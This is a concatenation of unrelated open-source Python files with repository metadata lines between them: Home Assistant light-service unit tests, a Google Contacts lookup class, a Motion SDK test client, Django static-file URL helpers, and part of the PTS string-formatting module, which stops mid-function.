self.assertEqual(SERVICE_TOGGLE, call.service)
self.assertEqual('entity_id_val', call.data[ATTR_ENTITY_ID])
self.assertEqual('transition_val', call.data[light.ATTR_TRANSITION])
def test_services(self):
"""Test the provided services."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
self.assertTrue(
setup_component(self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}))
dev1, dev2, dev3 = platform.DEVICES
# Test init
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# Test basic turn_on, turn_off, toggle services
light.turn_off(self.hass, entity_id=dev1.entity_id)
light.turn_on(self.hass, entity_id=dev2.entity_id)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
# turn on all lights
light.turn_on(self.hass)
self.hass.block_till_done()
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
self.assertTrue(light.is_on(self.hass, dev3.entity_id))
# turn off all lights
light.turn_off(self.hass)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# toggle all lights
light.toggle(self.hass)
self.hass.block_till_done()
self.assertTrue(light.is_on(self.hass, dev1.entity_id))
self.assertTrue(light.is_on(self.hass, dev2.entity_id))
self.assertTrue(light.is_on(self.hass, dev3.entity_id))
# toggle all lights
light.toggle(self.hass)
self.hass.block_till_done()
self.assertFalse(light.is_on(self.hass, dev1.entity_id))
self.assertFalse(light.is_on(self.hass, dev2.entity_id))
self.assertFalse(light.is_on(self.hass, dev3.entity_id))
# Ensure all attributes process correctly
light.turn_on(self.hass, dev1.entity_id,
transition=10, brightness=20, color_name='blue')
light.turn_on(
self.hass, dev2.entity_id, rgb_color=(255, 255, 255),
white_value=255)
light.turn_on(self.hass, dev3.entity_id, xy_color=(.4, .6))
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_TRANSITION: 10,
light.ATTR_BRIGHTNESS: 20,
light.ATTR_HS_COLOR: (240, 100),
}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (0, 0),
light.ATTR_WHITE_VALUE: 255,
}, data)
_, data = dev3.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
}, data)
# One of the light profiles
prof_name, prof_h, prof_s, prof_bri = 'relax', 35.932, 69.412, 144
# Test light profiles
light.turn_on(self.hass, dev1.entity_id, profile=prof_name)
# Specify a profile and a brightness attribute to overwrite it
light.turn_on(
self.hass, dev2.entity_id,
profile=prof_name, brightness=100)
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_BRIGHTNESS: prof_bri,
light.ATTR_HS_COLOR: (prof_h, prof_s),
}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({
light.ATTR_BRIGHTNESS: 100,
light.ATTR_HS_COLOR: (prof_h, prof_s),
}, data)
# Test bad data
light.turn_on(self.hass)
light.turn_on(self.hass, dev1.entity_id, profile="nonexisting")
light.turn_on(self.hass, dev2.entity_id, xy_color=["bla-di-bla", 5])
light.turn_on(self.hass, dev3.entity_id, rgb_color=[255, None, 2])
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({}, data)
_, data = dev3.last_call('turn_on')
self.assertEqual({}, data)
# faulty attributes will not trigger a service call
light.turn_on(
self.hass, dev1.entity_id,
profile=prof_name, brightness='bright')
light.turn_on(
self.hass, dev1.entity_id,
rgb_color='yellowish')
light.turn_on(
self.hass, dev2.entity_id,
white_value='high')
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({}, data)
_, data = dev2.last_call('turn_on')
self.assertEqual({}, data)
def test_broken_light_profiles(self):
"""Test light profiles."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
# Setup a wrong light file
with open(user_light_file, 'w') as user_file:
user_file.write('id,x,y,brightness\n')
user_file.write('I,WILL,NOT,WORK\n')
self.assertFalse(setup_component(
self.hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: 'test'}}))
def test_light_profiles(self):
"""Test light profiles."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
with open(user_light_file, 'w') as user_file:
user_file.write('id,x,y,brightness\n')
user_file.write('test,.4,.6,100\n')
self.assertTrue(setup_component(
self.hass, light.DOMAIN, {light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev1, _, _ = platform.DEVICES
light.turn_on(self.hass, dev1.entity_id, profile='test')
self.hass.block_till_done()
_, data = dev1.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
light.ATTR_BRIGHTNESS: 100
}, data)
def test_default_profiles_group(self):
"""Test default turn-on light profile for all lights."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
real_isfile = os.path.isfile
real_open = open
def _mock_isfile(path):
if path == user_light_file:
return True
return real_isfile(path)
def _mock_open(path):
if path == user_light_file:
return StringIO(profile_data)
return real_open(path)
profile_data = "id,x,y,brightness\n" +\
"group.all_lights.default,.4,.6,99\n"
with mock.patch('os.path.isfile', side_effect=_mock_isfile):
with mock.patch('builtins.open', side_effect=_mock_open):
with mock_storage():
self.assertTrue(setup_component(
self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev, _, _ = platform.DEVICES
light.turn_on(self.hass, dev.entity_id)
self.hass.block_till_done()
_, data = dev.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (71.059, 100),
light.ATTR_BRIGHTNESS: 99
}, data)
def test_default_profiles_light(self):
"""Test default turn-on light profile for a specific light."""
platform = loader.get_component(self.hass, 'light.test')
platform.init()
user_light_file = self.hass.config.path(light.LIGHT_PROFILES_FILE)
real_isfile = os.path.isfile
real_open = open
def _mock_isfile(path):
if path == user_light_file:
return True
return real_isfile(path)
def _mock_open(path):
if path == user_light_file:
return StringIO(profile_data)
return real_open(path)
profile_data = "id,x,y,brightness\n" +\
"group.all_lights.default,.3,.5,200\n" +\
"light.ceiling_2.default,.6,.6,100\n"
with mock.patch('os.path.isfile', side_effect=_mock_isfile):
with mock.patch('builtins.open', side_effect=_mock_open):
with mock_storage():
self.assertTrue(setup_component(
self.hass, light.DOMAIN,
{light.DOMAIN: {CONF_PLATFORM: 'test'}}
))
dev = next(filter(lambda x: x.entity_id == 'light.ceiling_2',
platform.DEVICES))
light.turn_on(self.hass, dev.entity_id)
self.hass.block_till_done()
_, data = dev.last_call('turn_on')
self.assertEqual({
light.ATTR_HS_COLOR: (50.353, 100),
light.ATTR_BRIGHTNESS: 100
}, data)
async def test_intent_set_color(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello_2', 'off', {
ATTR_SUPPORTED_FEATURES: light.SUPPORT_COLOR
})
hass.states.async_set('switch.hello', 'off')
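    # The switch with a matching friendly name must not be picked up by
    # the intent handler; only lights qualify.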
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
result = await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
}
})
await hass.async_block_till_done()
assert result.speech['plain']['speech'] == \
'Changed hello 2 to the color blue'
assert len(calls) == 1
call = calls[0]
assert call.domain == light.DOMAIN
assert call.service == SERVICE_TURN_ON
assert call.data.get(ATTR_ENTITY_ID) == 'light.hello_2'
assert call.data.get(light.ATTR_RGB_COLOR) == (0, 0, 255)
async def test_intent_set_color_tests_feature(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello', 'off')
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
try:
await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
}
})
assert False, 'handling intent should have raised'
except IntentHandleError as err:
assert str(err) == 'Entity hello does not support changing colors'
assert len(calls) == 0
async def test_intent_set_color_and_brightness(hass):
"""Test the set color intent."""
hass.states.async_set('light.hello_2', 'off', {
ATTR_SUPPORTED_FEATURES: (
light.SUPPORT_COLOR | light.SUPPORT_BRIGHTNESS)
})
hass.states.async_set('switch.hello', 'off')
calls = async_mock_service(hass, light.DOMAIN, light.SERVICE_TURN_ON)
hass.helpers.intent.async_register(light.SetIntentHandler())
result = await hass.helpers.intent.async_handle(
'test', light.INTENT_SET, {
'name': {
'value': 'Hello',
},
'color': {
'value': 'blue'
},
'brightness': {
'value': '20'
}
})
await hass.async_block_till_done()
assert result.speech['plain']['speech'] == \
'Changed hello 2 to the color blue and 20% brightness'
assert len(calls) == 1
call = calls[0]
assert call.domain == light.DOMAIN
assert call.service == SERVICE_TURN_ON
assert call.data.get(ATTR_ENTITY_ID) == 'light.hello_2'
assert call.data.get(light.ATTR_RGB_COLOR) == (0, 0, 255)
assert call.data.get(light.ATTR_BRIGHTNESS_PCT) == 20
async def test_light_context(hass):
"""Test that light context works."""
assert await async_setup_component(hass, 'light', {
'light': {
'platform': 'test'
}
})
state = hass.states.get('light.ceiling')
assert state is not None
await hass.services.async_call('light', 'toggle', {
'entity_id': state.entity_id,
}, True, core.Context(user_id='abcd'))
state2 = hass.states.get('light.ceiling')
assert state2 is not None
assert state.state != state2.state
assert state2.context.user_id == 'abcd'
| apache-2.0 | 7,891,534,767,537,181,000 | 33.198 | 79 | 0.585765 | false |
jakublipinski/i2Gmail-Backup-macOS-Messages-To-Gmail | contacts.py | 1 | 2674 | import gdata.data
import gdata.contacts.client
import gdata.contacts.data
import string
import config
class Contacts:
def __init__(self, credentials):
auth2token = gdata.gauth.OAuth2Token(client_id=credentials.client_id,
client_secret=credentials.client_secret,
scope='https://www.google.com/m8/feeds/contacts/default/full',
access_token=credentials.id_token,
refresh_token=credentials.refresh_token,
user_agent=config.APPLICATION_NAME)
self.client = gdata.contacts.client.ContactsClient()
auth2token.authorize(self.client)
self.email_to_name = {}
self.phone_to_name = {}
def load_contacts(self):
max_results = 99999
start_index = 1
query = gdata.contacts.client.ContactsQuery()
query.max_results = max_results
query.start_index = start_index
feed = self.client.GetContacts(q=query)
while feed:
for i, entry in enumerate(feed.entry):
if entry.name:
full_name = entry.name.full_name.text
primary_email = None
for email_entry in entry.email:
email = email_entry.address.lower()
if email_entry.primary and email_entry.primary=="true":
primary_email = email
if email in self.email_to_name:
print(u"Email address: '{}' is assigned to both '{}' and '{}'!".\
format(email, self.email_to_name[email], full_name))
else:
self.email_to_name[email] = (full_name, u'%s <%s>' % (full_name, email))
for phone_number_entry in entry.phone_number:
phone_number = Contacts.strip_and_reverse_phone_number(phone_number_entry.text)
if phone_number in self.phone_to_name:
print("Phone number: '%s' is assigned to both '%s' and '%s'!"%
(phone_number_entry.text, self.phone_to_name[phone_number], full_name))
else:
if primary_email:
self.phone_to_name[phone_number] = (
full_name, u'%s <%s>' % (full_name, primary_email))
else:
self.phone_to_name[phone_number] = (full_name, u'%s <%s>' % (full_name, phone_number_entry.text))
next_link = feed.GetNextLink()
if next_link:
feed = self.client.GetContacts(uri=next_link.href)
else:
feed = None
def get_by_phone_number(self, phone_number):
phone_number = Contacts.strip_and_reverse_phone_number(phone_number)
return self.phone_to_name.get(phone_number)
def get_by_email(self, email):
email = email.lower()
return self.email_to_name.get(email)
@staticmethod
def strip_and_reverse_phone_number(phone_number):
number = ''.join(ch for ch in phone_number if ch.isdigit())
if len(number)<3:
return phone_number
number = number[-9:]
number = number[::-1]
return number
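
# Worked example for strip_and_reverse_phone_number (illustrative, not
# part of the original module):
#   "+48 123-456-789" -> digits "48123456789" -> last nine "123456789"
#   -> reversed "987654321"
# Reversing the trailing digits lets numbers that differ only in country
# code or formatting map to the same lookup key in phone_to_name.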
| mit | 2,101,036,142,555,594,800 | 32.012346 | 105 | 0.665669 | false |
bmswgnp/sdk | python/test.py | 1 | 5131 | #
# Simple test program for the Python Motion SDK.
#
# @file tools/sdk/python/test.py
# @author Luke Tokheim, [email protected]
# @version 2.2
#
# Copyright (c) 2015, Motion Workshop
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import sys
from MotionSDK import *
PortPreview = 32079
PortSensor = 32078
PortRaw = 32077
PortConfigurable = 32076
PortConsole = 32075
NSample = 10
def test_Client(host, port):
client = Client(host, port)
print "Connected to " + str(host) + ":" + str(port)
xml_string = "<?xml version=\"1.0\"?><configurable><preview><Gq/></preview><sensor><a/></sensor></configurable>"
if client.writeData(xml_string):
print "Sent active channel definition to Configurable service"
if client.waitForData():
sample_count = 0
while sample_count < NSample:
data = client.readData()
if None == data:
break
if PortPreview == port:
container = Format.Preview(data)
for key in container:
q = container[key].getQuaternion(False)
print "q(" + str(key) + ") = (" + str(q[0]) + ", " + str(q[1]) + "i, " + str(q[2]) + "j, " + str(q[3]) + "k)"
if PortSensor == port:
container = Format.Sensor(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ") g"
if PortRaw == port:
container = Format.Raw(data)
for key in container:
a = container[key].getAccelerometer()
print "a(" + str(key) + ") = (" + str(a[0]) + ", " + str(a[1]) + ", " + str(a[2]) + ")"
if PortConfigurable == port:
container = Format.Configurable(data)
for key in container:
line = "data(" + str(key) + ") = ("
for i in range(container[key].size()):
if i > 0:
line += ", "
line += str(container[key].value(i))
line += ")"
print line
sample_count += 1
def test_LuaConsole(host, port):
client = Client(host, port)
print("Connected to " + str(host) + ":" + str(port))
#
# General Lua scripting interface.
#
lua_chunk = \
"if not node.is_reading() then" \
" node.close()" \
" node.scan()" \
" node.start()" \
" end" \
" if node.is_reading() then" \
" print('Reading from ' .. node.num_reading() .. ' device(s)')" \
" else" \
" print('Failed to start reading')" \
" end"
print LuaConsole.SendChunk(client, lua_chunk, 5)
# Scripting language compatibility class. Translate
# Python calls into Lua calls and send them to the
# console service.
node = LuaConsole.Node(client)
print "node.is_reading() = " + str(node.is_reading())
def test_File():
filename = "../../test_data/sensor.bin";
print "reading take data file: \"" + filename + "\""
take_file = File(filename)
while True:
data = take_file.readData(9, True)
if None == data:
break
print Format.SensorElement(data).getAccelerometer()
def main(argv):
# Set the default host name parameter. The SDK is
# socket based so any networked Motion Service is
# available.
host = ""
if len(argv) > 1:
host = argv[1]
test_LuaConsole(host, PortConsole)
test_Client(host, PortPreview)
test_Client(host, PortSensor)
test_Client(host, PortRaw)
test_Client(host, PortConfigurable)
test_File()
if __name__ == "__main__":
sys.exit(main(sys.argv))
| bsd-2-clause | 1,064,305,266,750,681,900 | 31.474684 | 129 | 0.588384 | false |
bop/foundation | lib/python2.7/site-packages/staticfiles/urls.py | 1 | 1283 | import re
from django.conf import settings
from django.conf.urls.defaults import patterns, url
from django.core.exceptions import ImproperlyConfigured
urlpatterns = []
def static(prefix, view='django.views.static.serve', **kwargs):
"""
    Helper function to return a URL pattern for serving files in debug mode::

        from django.conf import settings
        from django.conf.urls.static import static

        urlpatterns = patterns('',
            # ... the rest of your URLconf goes here ...
        ) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"""
    # No-op if not in debug mode or a non-local prefix
if not settings.DEBUG or (prefix and '://' in prefix):
return []
elif not prefix:
raise ImproperlyConfigured("Empty static prefix not permitted")
return patterns('',
url(r'^%s(?P<path>.*)$' % re.escape(prefix.lstrip('/')), view, kwargs=kwargs),
)
def staticfiles_urlpatterns(prefix=None):
"""
Helper function to return a URL pattern for serving static files.
"""
if prefix is None:
prefix = settings.STATIC_URL
return static(prefix, view='staticfiles.views.serve')
# Only append if urlpatterns are empty
if settings.DEBUG and not urlpatterns:
urlpatterns += staticfiles_urlpatterns()
| gpl-2.0 | 5,661,768,768,317,236,000 | 31.075 | 86 | 0.686672 | false |
SKIRT/PTS | core/tools/stringify.py | 1 | 41185 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.core.tools.stringify Provides useful functions for converting objects of various types to strings.
# -----------------------------------------------------------------
# Ensure Python 3 compatibility
from __future__ import absolute_import, division, print_function
# Import standard modules
import copy
import warnings
# Import the relevant PTS classes and modules
from . import types
from . import introspection
from . import sequences
from . import strings
from . import numbers
# -----------------------------------------------------------------
def tostr(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# Get the 'scientific' flag
scientific = kwargs.get("scientific", None)
scientific_int = kwargs.pop("scientific_int", True) # also represent integers in scientific notation
# Set default number of decimal places
#decimal_places = kwargs.pop("decimal_places", None) # let it be done automatically in the str_from_... function
#print(str(value), "nd", decimal_places)
#ndigits = kwargs.pop("ndigits", None)
decimal_places = kwargs.get("decimal_places", None)
ndigits = kwargs.get("ndigits", None)
# Set scientific flag flexibly, if scientific flag was not passed explicitly
if scientific is None:
# Integer value
if (scientific_int and types.is_integer_type(value)) or (types.is_real_type(value) and numbers.is_integer(value)):
# Convert to be certain (if from float)
value = int(value)
#if -1e4 <= value <= 1e4: scientific = False
if -999 < value < 999:
scientific = False
if ndigits is None: decimal_places = 0
else: scientific = True
# No decimals for integers
#decimal_places = 0 YES: OF COURSE THERE MUST BE DECIMAL PLACES FOR SCIENTIFIC NOTATION
# Real value
elif types.is_real_type(value):
#if -1e4 <= value <= 1e4: scientific = False
if -999.99 < value < 999.99: scientific = False
else: scientific = True
# Quantity
elif introspection.lazy_isinstance(value, "Quantity", "astropy.units", return_false_if_fail=True):
if -999.99 < value.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "QuantityRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min.value and value.max.value < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "RealRange", "pts.core.basics.range", return_false_if_fail=True):
if -999.99 < value.min and value.max < 999.99: scientific = False
else: scientific = True
elif introspection.lazy_isinstance(value, "IntegerRange", "pts.core.basics.range", return_false_if_fail=True):
if -999 < value.min and value.max < 999: scientific = False
else: scientific = True
# Other
else: scientific = False
#print("scien", scientific)
#print("dec", decimal_places)
#print("nd", ndigits)
# Set the options
kwargs["scientific"] = scientific
kwargs["decimal_places"] = decimal_places
kwargs["ndigits"] = ndigits
# Set scientific flag for integers
elif types.is_integer_type(value) or (types.is_real_type(value) and numbers.is_integer(value)):
if scientific:
# ONLY IF SCIENTIFIC_INT IS TRUE
if scientific_int:
# ONLY IF NECESSARY
if -999 < value < 999: scientific = False
else: scientific = True
# Don't apply 'scientific' to integers
else: scientific = False
# Set flag
kwargs["scientific"] = scientific
kwargs["ndigits"] = ndigits
# Stringify
return stringify(value, **kwargs)[1].strip()
# -----------------------------------------------------------------
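# Illustrative usage of tostr() (a sketch; the exact strings come from the
# str_from_* helpers further below):
#
#   tostr(5)                        -> "5"       (small integer)
#   tostr(0.5)                      -> "0.5"
#   tostr(123456)                   -> "1.23e5"  (switches to scientific)
#   tostr([1, 2, 3], delimiter=";") -> "1;2;3"
# -----------------------------------------------------------------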
def stringify(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
# List or derived from list
if isinstance(value, list): return stringify_list(value, **kwargs)
# Dictionary
if isinstance(value, dict): return stringify_dict(value, **kwargs)
# Array or derived from Array, but not quantity!
#elif isinstance(value, np.ndarray) and not isinstance(value, Quantity):
#elif introspection.try_importing_module("numpy", True) and (isinstance(value, np.ndarray) and not hasattr(value, "unit")):
# WE ALSO TEST IF THIS IS NOT A NUMPY INTEGER, FLOAT OR BOOLEAN (because they have a __array__ attribute)
elif types.is_array_like(value): return stringify_array(value, **kwargs)
# Column or masked masked column
elif types.is_astropy_column(value): return stringify_array(value, **kwargs)
# Tuple or derived from tuple
elif isinstance(value, tuple): return stringify_tuple(value, **kwargs)
# All other
#else: return stringify_not_list(value, scientific=scientific, decimal_places=decimal_places, fancy=fancy, ndigits=ndigits, unicode=unicode, **kwargs)
else: return stringify_not_list(value, **kwargs)
# -----------------------------------------------------------------
def get_parsing_type(value):
"""
This function ...
:param value:
:return:
"""
ptype, string = stringify(value)
return ptype
# -----------------------------------------------------------------
def can_get_item(value):
"""
This function ...
:param value:
:return:
"""
#print(value, type(value))
try:
length = len(value)
except TypeError: return False
    if length == 0: return True
else:
try:
item = value[0]
return True
except IndexError: return False
# -----------------------------------------------------------------
def get_strings(values, return_types=False, value_kwargs=None, add_quotes=False, quote_character="'"):
"""
This function ...
:param values:
:param return_types:
:param value_kwargs:
:param add_quotes:
:param quote_character:
:return:
"""
if value_kwargs is None: value_kwargs = {}
strings = []
ptype = None
ptypes = set()
# Loop over the values
for entry in values:
# parsetype, val = stringify_not_list(entry)
parsetype, val = stringify(entry, **value_kwargs)
# from ..basics.configuration import parent_type
# if add_quotes and parent_type(parsetype) == "string":
if add_quotes and types.is_string_type(entry): val = quote_character + val + quote_character
if ptype is None: ptype = parsetype
elif ptype != parsetype:
# raise ValueError("Nonuniform list")
ptype = "mixed"
# Add the parse type
ptypes.add(parsetype)
# Add the string
strings.append(val)
# Return the strings
if return_types: return strings, list(ptypes), ptype
else: return strings
# -----------------------------------------------------------------
def stringify_list(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#print("kwargs", kwargs)
#if len(value) == 0: raise ValueError("Cannot stringify an empty list")
if len(value) == 0: return "list", ""
# If delimiter is passed for stringifying the values in the list
value_kwargs = copy.copy(kwargs)
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
elif "delimiter" in value_kwargs: del value_kwargs["delimiter"]
# If delimiter is passed for stringifying the keys in the list
#key_kwargs = copy.copy(kwargs)
#if "key_delimiter" in key_kwargs: key_kwargs["delimiter"] = key_kwargs.pop("key_delimiter")
#elif "delimiter" in key_kwargs: del key_kwargs["delimiter"]
# If quotes have to be added
add_quotes = kwargs.pop("add_quotes", False)
quote_character = kwargs.pop("quote_character", "'")
# Get strings
strings, ptypes, ptype = get_strings(value, return_types=True, value_kwargs=value_kwargs, add_quotes=add_quotes, quote_character=quote_character)
from ..basics.configuration import parent_type
from ..basics.log import log
if len(ptypes) == 1: ptype = ptypes[0]
elif sequences.all_equal(ptypes): ptype = ptypes[0]
else:
# Investigate the different ptypes
parent_types = [parent_type(type_name) for type_name in ptypes]
# Check
for i in range(len(parent_types)):
if parent_types[i] is None: log.warning("Could not determine the parent type for '" + ptypes[i] + "'. All parent types: " + str(parent_types))
#print("Parent types:", parent_types)
if sequences.all_equal(parent_types) and parent_types[0] is not None: ptype = parent_types[0]
elif ptype == "mixed": log.warning("Could not determine a common type for '" + stringify(parent_types)[1] + "'")
# Get delimiter for list
delimiter = kwargs.pop("delimiter", ",")
# Return the type and the string
if ptype.endswith("list"):
top_delimiter = delimiter + " "
return ptype + "_list", top_delimiter.join(strings)
else: return ptype + "_list", delimiter.join(strings)
# -----------------------------------------------------------------
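# Example (sketch): stringify_list([1, 2, 3]) -> ("integer_list", "1,2,3");
# for mixed entries such as [1, "a"] the type falls back to a common parent
# type via parent_type(), or to "mixed" when none exists.
# -----------------------------------------------------------------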
def represent_dict(value, **kwargs):
"""
    This function ...
:param value:
:param kwargs:
:return:
"""
if len(value) == 0: return ""
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
parts = []
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
# DON't QUOTE THESE
if vtype == "integer" or vtype == "real" or vtype == "boolean": vstring_with_quotes = vstring
# Quote values
elif quote_value:
# Don't quote after all
if key in no_quote_value_for_keys: vstring_with_quotes = vstring
# Just quote
else: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote values
else:
# DO quote after all
if key in quote_value_for_keys: vstring_with_quotes = quote_character + vstring + quote_character
# Don't quote
else: vstring_with_quotes = vstring
# Determine line
string = kstring_with_quotes + identity_symbol + vstring_with_quotes
# Add line
parts.append(string)
# Get delimiter
delimiter = kwargs.pop("delimiter", ",")
# Return
return delimiter.join(parts)
# -----------------------------------------------------------------
def stringify_dict(value, **kwargs):
"""
This function ...
:param value:
:param kwargs:
:return:
"""
#if len(value) == 0: raise ValueError("Cannot stringify an empty dictionary")
if len(value) == 0: return "dictionary", ""
keytype = None
ptype = None
parts = []
keytypes = set()
ptypes = set()
# Only for stringifying the values
value_kwargs = copy.copy(kwargs)
# If delimiter is passed for stringifying the values in the list
if "value_delimiter" in value_kwargs: value_kwargs["delimiter"] = value_kwargs.pop("value_delimiter")
# Get identify symbol
identity_symbol = kwargs.pop("identity_symbol", ": ")
quote_key = kwargs.pop("quote_key", True)
quote_value = kwargs.pop("quote_value", True)
quote_character = kwargs.pop("quote_character", "'")
# Don't quote certain thingies
no_quote_keys = kwargs.pop("no_quote_keys", [])
no_quote_value_for_keys = kwargs.pop("no_quote_value_for_keys", [])
# Do quote certain thingies
quote_keys = kwargs.pop("quote_keys", [])
quote_value_for_keys = kwargs.pop("quote_value_for_keys", [])
replace_spaces_keys = kwargs.pop("replace_spaces_keys", None)
replace_spaces_values = kwargs.pop("replace_spaces_values", None)
replace_in_keys = kwargs.pop("replace_in_keys", None)
replace_in_values = kwargs.pop("replace_in_values", None)
# Loop over the dictionary keys
for key in value:
# Stringify the key
ktype, kstring = stringify(key, **kwargs)
if replace_spaces_keys is not None: kstring = kstring.replace(" ", replace_spaces_keys)
if replace_in_keys is not None: kstring = strings.replace_from_dict(kstring, replace_in_keys)
# Add key type
keytypes.add(ktype)
# Check key type
if keytype is None: keytype = ktype
elif keytype != ktype: keytype = "mixed"
v = value[key]
# Stringify the value
vtype, vstring = stringify(v, **value_kwargs)
if replace_spaces_values is not None: vstring = vstring.replace(" ", replace_spaces_values)
if replace_in_values is not None: vstring = strings.replace_from_dict(vstring, replace_in_values)
# Add value type
ptypes.add(vtype)
# Check value type
if ptype is None: ptype = vtype
elif ptype != vtype: ptype = "mixed"
# if quote_key and key not in no_quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# else: kstring_with_quotes = kstring
# Quote keys
if quote_key:
# Don't quote after all
if key in no_quote_keys: kstring_with_quotes = kstring
# Quote
else: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote keys
else:
# Quote after all
if key in quote_keys: kstring_with_quotes = quote_character + kstring + quote_character
# Don't quote
else: kstring_with_quotes = kstring
